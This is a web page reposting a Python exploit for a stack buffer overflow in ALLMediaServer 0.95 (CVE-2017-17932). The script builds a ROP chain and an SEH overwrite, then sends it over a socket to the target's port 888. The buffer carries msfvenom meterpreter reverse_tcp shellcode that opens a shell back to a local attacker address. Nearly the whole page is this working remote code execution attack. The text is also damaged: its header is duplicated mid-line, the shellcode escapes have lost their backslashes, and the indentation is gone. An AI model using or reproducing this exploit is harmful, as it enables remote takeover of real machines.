Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

ALLMediaServer 0.95 Stack Buffer Overflow

Details
Category: Vulnerabilities
Hits: 449
#!/usr/bin/python
# Exploit Title: Stack Buffer Overflow in ALLMediaServer 0.95
# Exploit Author: Mario Kartone Ciccarelli
# Contact: https://twitter.com/Kartone
# CVE: CVE-2017-17 #!/usr/bin/python
# Exploit Title: Stack Buffer Overflow in ALLMediaServer 0.95
# Exploit Author: Mario Kartone Ciccarelli
# Contact: https://twitter.com/Kartone
# CVE: CVE-2017-17932
# Date: 09-01-2018
# Thanks to PoC: https://www.exploit-db.com/exploits/43406/
# Software link: http://www.allmediaserver.org/download
# Version: 0.95
# Attack: Remote Code Execution
# Tested on: Windows 7 x64 Ultimate Eng SP1

import sys
import socket
import struct

def main():

def create_rop_chain():

rop_gadgets = [
0x00407f5d, # POP EAX # RETN [MediaServer.exe]
0x00797250, # ptr to &VirtualAlloc() [IAT MediaServer.exe]
0x004061db, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MediaServer.exe]
0x0053bc02, # XCHG EAX,ESI # RETN [MediaServer.exe]
0x006c71f8, # POP EBP # RETN [MediaServer.exe]
0x00449a05, # & jmp esp [MediaServer.exe]
0x0049bbc4, # POP EBX # RETN [MediaServer.exe]
0x00000001, # 0x00000001-> ebx
0x00500b33, # POP EDX # RETN [MediaServer.exe]
0x00001000, # 0x00001000-> edx
0x006b5c67, # POP ECX # RETN [MediaServer.exe]
0x00000040, # 0x00000040-> ecx
0x0042365d, # POP EDI # RETN [MediaServer.exe]
0x006def0d, # RETN (ROP NOP) [MediaServer.exe]
0x0040710f, # POP EAX # RETN [MediaServer.exe]
0x90909090, # nop
0x0068c35c, # PUSHAD # RETN [MediaServer.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.134 lport=4444 -f python
shellcode32 = ""
shellcode32 += "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
shellcode32 += "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
shellcode32 += "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
shellcode32 += "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
shellcode32 += "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
shellcode32 += "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
shellcode32 += "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
shellcode32 += "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
shellcode32 += "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
shellcode32 += "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
shellcode32 += "x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68"
shellcode32 += "x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8"
shellcode32 += "x90x01x00x00x29xc4x54x50x68x29x80x6bx00"
shellcode32 += "xffxd5x6ax0ax68xc0xa8x00x86x68x02x00x11"
shellcode32 += "x5cx89xe6x50x50x50x50x40x50x40x50x68xea"
shellcode32 += "x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
shellcode32 += "x74x61xffxd5x85xc0x74x0axffx4ex08x75xec"
shellcode32 += "xe8x61x00x00x00x6ax00x6ax04x56x57x68x02"
shellcode32 += "xd9xc8x5fxffxd5x83xf8x00x7ex36x8bx36x6a"
shellcode32 += "x40x68x00x10x00x00x56x6ax00x68x58xa4x53"
shellcode32 += "xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9"
shellcode32 += "xc8x5fxffxd5x83xf8x00x7dx22x58x68x00x40"
shellcode32 += "x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57"
shellcode32 += "x68x75x6ex4dx61xffxd5x5ex5exffx0cx24xe9"
shellcode32 += "x71xffxffxffx01xc3x29xc6x75xc7xc3xbbxf0"
shellcode32 += "xb5xa2x56x6ax00x53xffxd5"

# Stack-pivot at 0x0042b356 : {pivot 2052 / 0x804} : # ADD ESP,800 # POP EBX # RETN ** [MediaServer.exe] ** | startnull {PAGE_EXECUTE_READ}

size = 3000
seh_offset = 1072
sp_offset = 548

buffer = ""
buffer += "A" * sp_offset
buffer += rop_chain
buffer += "xe9xcbx01x00x00" # JMP $1d0
buffer += "A" * (seh_offset - len(buffer))
buffer += "xffxffxffxff" # NSEH record
buffer += struct.pack('<L', 0x0042b356 ) # Stackpivot on SEH record
buffer += shellcode32
buffer += "B" * (size - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 888))
print "[+] AllMediaServer 0.95 Stack Buffer Overflow Exploit"
print "[+] Sending evil payload to " + sys.argv[1] + "..."
s.send(buffer)
s.close()


if __name__ == '__main__':

main()